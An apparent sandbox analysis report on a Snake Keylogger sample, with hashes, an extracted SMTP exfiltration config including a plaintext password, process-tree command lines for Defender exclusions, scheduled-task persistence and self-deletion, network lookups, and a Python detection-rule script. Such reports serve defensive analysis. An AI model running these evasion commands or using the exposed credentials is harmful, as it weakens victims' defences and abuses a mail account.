Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    06/12/2024, 03:25 UTC

General

  • Target

    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe

  • Size

    513KB

  • MD5

    f747bd84ca6e30d0f6c82363613df40b

  • SHA1

    c50a288da4d21ee75622bd30fc3a2fa69a488e8c

  • SHA256

    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7

  • SHA512

    d33b0b4c46cf265584104876607a59374eab4e38e82b213a1852e47c22fc25ef378d57d933586eb0f8bbd3fcdb4e26e2d8c0d89beb696f16f49256675dcdb872

  • SSDEEP

    6144:8eEKVOJIA7ezJbjWSECMLYmPxjzkoz9btOvDeF/4erMBx6taEga4X2q/uXR8Yx5j:bUSFbjp4zxoferaKih4RzycBIyp

Malware Config

Extracted

Family

snakekeylogger

Credentials

  • Protocol:
    smtp
  • Host:
    mail.murchisonspice.co.za
  • Port:
    587
  • Username:
    orders@murchisonspice.co.za
  • Password:
    orders786q#

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 1 IoCs
  • Snakekeylogger family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell (Add-MpPreference) to add Windows Defender exclusions for file extensions, paths or processes, so the dropped payload is never scanned.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    "C:\Users\Admin\AppData\Local\Temp\de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3744
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2256
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\sXYzukdZLvdwQb.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4984
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sXYzukdZLvdwQb" /XML "C:\Users\Admin\AppData\Local\Temp\tmpC9B8.tmp"
      2⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:4760
    • C:\Users\Admin\AppData\Local\Temp\de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
      "C:\Users\Admin\AppData\Local\Temp\de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5088
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Windows\SysWOW64\choice.exe
          choice /C Y /N /D Y /T 3
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2660
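
The process tree above is the whole defence-evasion and persistence story in four command lines: two Defender exclusions for user-writable paths, a scheduled task created from an XML file in %TEMP%, the sample re-launching its own image (the SetThreadContext/WriteProcessMemory hits), and a delayed self-delete via choice.exe. The following is an added example, not part of the sandbox report, showing how those four shapes translate into process-creation detection rules. The events are constructed to mirror the tree on this page; the root's parent PID and the final benign control event are assumptions.

```python
"""Process-tree detection rules for the behaviours shown in this report (added example)."""
import re
from dataclasses import dataclass

SAMPLE = "de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe"
TEMP = "C:\\Users\\Admin\\AppData\\Local\\Temp"
SAMPLE_PATH = TEMP + "\\" + SAMPLE
PS32 = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
PS_CMD = '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"'


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # image path as the kernel sees it (SysWOW64 for the 32-bit hosts here)
    cmdline: str   # command line as logged (System32 path, redirected by WoW64)


# Constructed process-creation events modelled on this report's tree. The root's ppid (1)
# and the last, benign event are assumptions, not data from the report.
EVENTS = [
    ProcEvent(3744, 1, SAMPLE_PATH, f'"{SAMPLE_PATH}"'),
    ProcEvent(2256, 3744, PS32, f'{PS_CMD} Add-MpPreference -ExclusionPath "{SAMPLE_PATH}"'),
    ProcEvent(4984, 3744, PS32, f'{PS_CMD} Add-MpPreference -ExclusionPath '
                                '"C:\\Users\\Admin\\AppData\\Roaming\\sXYzukdZLvdwQb.exe"'),
    ProcEvent(4760, 3744, "C:\\Windows\\SysWOW64\\schtasks.exe",
              f'"C:\\Windows\\System32\\schtasks.exe" /Create /TN "Updates\\sXYzukdZLvdwQb" '
              f'/XML "{TEMP}\\tmpC9B8.tmp"'),
    ProcEvent(5088, 3744, SAMPLE_PATH, f'"{SAMPLE_PATH}"'),
    ProcEvent(2540, 5088, "C:\\Windows\\SysWOW64\\cmd.exe",
              f'"C:\\Windows\\System32\\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "{SAMPLE_PATH}"'),
    ProcEvent(2660, 2540, "C:\\Windows\\SysWOW64\\choice.exe", "choice /C Y /N /D Y /T 3"),
    # Benign control: an administrator excluding a vendor install directory.
    ProcEvent(7000, 6000, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              'powershell.exe Add-MpPreference -ExclusionPath "C:\\Program Files\\Vendor"'),
]

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
RULES = []  # (name, ATT&CK technique, callable(event, by_pid) -> dict | None)


def rule(name, technique):
    def wrap(fn):
        RULES.append((name, technique, fn))
        return fn
    return wrap


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


@rule("defender_exclusion_user_path", "T1562.001")
def r_exclusion(ev, by_pid):
    if basename(ev.image) != "powershell.exe":
        return None
    m = re.search(r'Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+"?([^"]+)"?', ev.cmdline, re.I)
    if not m:
        return None
    target = m.group(2)
    # An exclusion pointing into a user profile directory is the malicious shape;
    # a vendor directory under Program Files is still reported, at low severity.
    return {"severity": "high" if USER_WRITABLE.search(target) else "low", "excluded": target}


@rule("schtasks_xml_from_temp", "T1053.005")
def r_schtasks(ev, by_pid):
    if basename(ev.image) != "schtasks.exe":
        return None
    cl = ev.cmdline.lower()
    m = re.search(r'/xml\s+"?([^"]+\\temp\\[^"]+)', cl) if "/create" in cl else None
    return {"severity": "high", "xml": m.group(1)} if m else None


@rule("delayed_self_delete", "T1070.004")
def r_self_delete(ev, by_pid):
    if basename(ev.image) != "cmd.exe":
        return None
    m = re.search(r'choice\s+/C\s+Y\s+/N\s+/D\s+Y\s+/T\s+(\d+)\s*&\s*del\s+"?([^"]+)"?', ev.cmdline, re.I)
    if not m:
        return None
    parent = by_pid.get(ev.ppid)
    deletes_parent = parent is not None and parent.image.lower() == m.group(2).lower()
    return {"severity": "high" if deletes_parent else "medium", "delay_s": int(m.group(1)),
            "deleted": m.group(2), "deletes_parent_image": deletes_parent}


@rule("self_spawn_same_image", "T1055")
def r_self_spawn(ev, by_pid):
    # A binary re-launching its own image is the usual prelude to hollowing the child.
    parent = by_pid.get(ev.ppid)
    if parent is None or parent.image.lower() != ev.image.lower():
        return None
    return {"severity": "high" if USER_WRITABLE.search(ev.image) else "medium", "parent_pid": parent.pid}


def detect(events):
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        for name, technique, fn in RULES:
            hit = fn(ev, by_pid)
            if hit:
                findings.append({"rule": name, "technique": technique, "pid": ev.pid, **hit})
    return findings


def summarize(findings):
    """Map rule name -> list of PIDs that triggered it."""
    out = {}
    for f in findings:
        out.setdefault(f["rule"], []).append(f["pid"])
    return out


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

The self-delete rule is worth the parent lookup: `choice /T 3 & Del` on its own is noisy in installers, but a cmd.exe whose parent's image is the very file being deleted is the sample cleaning up after hollowing its second instance, which is exactly the 5088 -> 2540 relationship above. Note that these rules key on command-line shape, so an exclusion added through the MpPreference WMI class or a task registered via the Schedule API would need separate telemetry (Defender event 5007, task-scheduler operational log).
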

Network

  • Country: US
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • Country: US
    DNS
    88.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.210.23.2.in-addr.arpa
    IN PTR
    Response
    88.210.23.2.in-addr.arpa
    IN PTR
    a2-23-210-88.deploy.static.akamaitechnologies.com
  • Country: US
    DNS
    0.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.159.190.20.in-addr.arpa
    IN PTR
    Response
  • Country: US
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • Country: US
    DNS
    154.239.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    154.239.44.20.in-addr.arpa
    IN PTR
    Response
  • Country: US
    DNS
    checkip.dyndns.org
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    8.8.8.8:53
    Request
    checkip.dyndns.org
    IN A
    Response
    checkip.dyndns.org
    IN CNAME
    checkip.dyndns.com
    checkip.dyndns.com
    IN A
    132.226.247.73
    checkip.dyndns.com
    IN A
    193.122.130.0
    checkip.dyndns.com
    IN A
    193.122.6.168
    checkip.dyndns.com
    IN A
    132.226.8.169
    checkip.dyndns.com
    IN A
    158.101.44.242
  • Country: BR
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:49 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 35dd0809dafe2f4df972c2c071bdc0dc
  • Country: BR
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:49 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 25ba7606a30fc8be7682734a462bebab
  • Country: BR
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:50 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: fd8a0039b0fc52fff26a8a1bacbdb01d
  • Country: BR
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:50 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: ec28cc0ee149e0e09157672414d2aef8
  • Country: BR
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:52 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: fac5f795cc2df39de56e264ac4cc346f
  • Country: BR
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:53 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 70cf23be1236cc7e78f786e8ba55e67f
  • Country: BR
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:54 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 524cebf497ad11e1b1d55d0368d0cb61
  • Country: BR
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:54 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 0ffae663004d6f66aae56cc35cbd13b1
  • Country: BR
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:54 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 50e620af991c617508df7e6362147a05
  • Country: US
    DNS
    reallyfreegeoip.org
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    8.8.8.8:53
    Request
    reallyfreegeoip.org
    IN A
    Response
    reallyfreegeoip.org
    IN A
    172.67.177.134
    reallyfreegeoip.org
    IN A
    104.21.67.152
  • Country: US
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:49 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943003
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sUK44IpkoRondjeGDTa13I7cQ7HOe20%2BLOeV1ejn7M9JyTtZrAsGmlOWm669LMttwsoDx%2Ffyl3UtQrl8AZsfW5p39%2FtmaMENRNnA9V%2BdXP4PP0VOZLuDLojy1caPNDGLYvlQSuZe"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92bc28a859457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=29690&min_rtt=26335&rtt_var=11929&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3010&recv_bytes=390&delivery_rate=128345&cwnd=233&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=95&x=0"
  • Country: US
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:50 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943004
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qxcjxW%2BYTRBAauyy98GXCyKy9KKHAu%2B8ZQAWA%2FAksrnPhNVVxMAeh57R%2F4r%2FdOLZo0zAuSuQMWmb9pCjH64ObPMsGi66qUWVouJiGQSMMo0ViKt3nkz%2FP60vJWeuXxrynBSykcIC"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92bc46bee9457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=35227&min_rtt=26335&rtt_var=20022&sent=6&recv=8&lost=0&retrans=0&sent_bytes=4281&recv_bytes=482&delivery_rate=128345&cwnd=234&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=401&x=0"
  • Country: US
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:50 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943004
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GVoNXcRgfGmV3E0fBRj1UUkuO%2B%2BEiLqKoahF1Tg2jxoRwKnmmUNAxsQvEpfuh6FzTDfPU%2FmaXOuIJt7e3rZPhIubwEg5OhNHp3J51mP4nXcmEEjQDQxFJX3vtpeNvHla6rUggXSP"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92bc87e639457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=39834&min_rtt=26335&rtt_var=24230&sent=7&recv=10&lost=0&retrans=0&sent_bytes=5557&recv_bytes=574&delivery_rate=128345&cwnd=235&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=1046&x=0"
  • Country: US
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:53 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943007
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=caLoYYubvAXxdmxIF5HYhROn5UbCyjzS8Wo9g1JYoxueBVjR6FqWqbzD0F5bmRKm5gE1GacPAS0AgApD63SgWuQ9cQVqWSHmqEKgnkQ7bXI3slIQ9h4GN3cpX0aERUzCVPGQMxbm"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92bd6bf799457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=50098&min_rtt=26335&rtt_var=38700&sent=8&recv=12&lost=0&retrans=0&sent_bytes=6829&recv_bytes=666&delivery_rate=128345&cwnd=236&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=3324&x=0"
  • Country: US
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:53 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943007
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kZfbrlH4QJOpgIuKoNN66fXW2oSTCzJNAu5dglktgDRXBi9waH3sK9Ee4ylZ7BPN7pwffhtp8RST05fqcAIUpRkD5WK1MmEVbvMq3puPQ6VNIrsDOch6BptnNRkXNpDMgPwiaXTz"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92bd838699457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=64312&min_rtt=26335&rtt_var=57452&sent=9&recv=14&lost=0&retrans=0&sent_bytes=8095&recv_bytes=758&delivery_rate=128345&cwnd=237&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=3566&x=0"
  • Country: US
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:54 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943008
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=78tyxRYz9qjcgenk9uhvTjQwltLR%2FKalcqJAktxdtXmPHZaRS0B5SezpdQAl9UaYp1sVRX6XR2kEmAYt0deTx61L60VB8l0%2FDnbFBx72BFXy5hAOIx46hWxAM7pX%2BDyz%2BkOdTMx%2B"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92be00df09457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=71596&min_rtt=26335&rtt_var=57658&sent=10&recv=16&lost=0&retrans=0&sent_bytes=9361&recv_bytes=850&delivery_rate=128345&cwnd=237&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=4815&x=0"
  • Country: US
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:54 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943008
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SduV6SHUMwZUN%2FdtLkduKGCtFzWhZHhLiuVm2KBlHgUfXj2Op8j%2FoPKlWVrszDjtgTpIuXpGK676uKCHOf1z0y0mPgnbkX4kQgr%2BuM8K4%2FZ5HUveQo%2BiykEBD7qNlqKnnbF6%2BeFh"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92be19f159457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=89121&min_rtt=26335&rtt_var=78293&sent=11&recv=18&lost=0&retrans=0&sent_bytes=10638&recv_bytes=942&delivery_rate=128345&cwnd=237&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=5064&x=0"
  • Country: US
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:55 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943009
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SNSiYhTfz5yffqR%2BbmIPs40qxNQwvfV2dmcUE56a0uQxinYtPIdc96Z0hcWhSH%2FcnxtlEessdDLR%2BNXhCtxz3vcUaf8f%2B8QjyL%2FxWuEv1vfjk9Ux9lrL6F2UwjEQMaLES%2F2ddW1%2B"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92be318439457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=98766&min_rtt=26335&rtt_var=78011&sent=12&recv=20&lost=0&retrans=0&sent_bytes=11918&recv_bytes=1034&delivery_rate=128345&cwnd=237&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=5306&x=0"
  • Country: US
    DNS
    73.247.226.132.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.247.226.132.in-addr.arpa
    IN PTR
    Response
  • Country: US
    DNS
    134.177.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
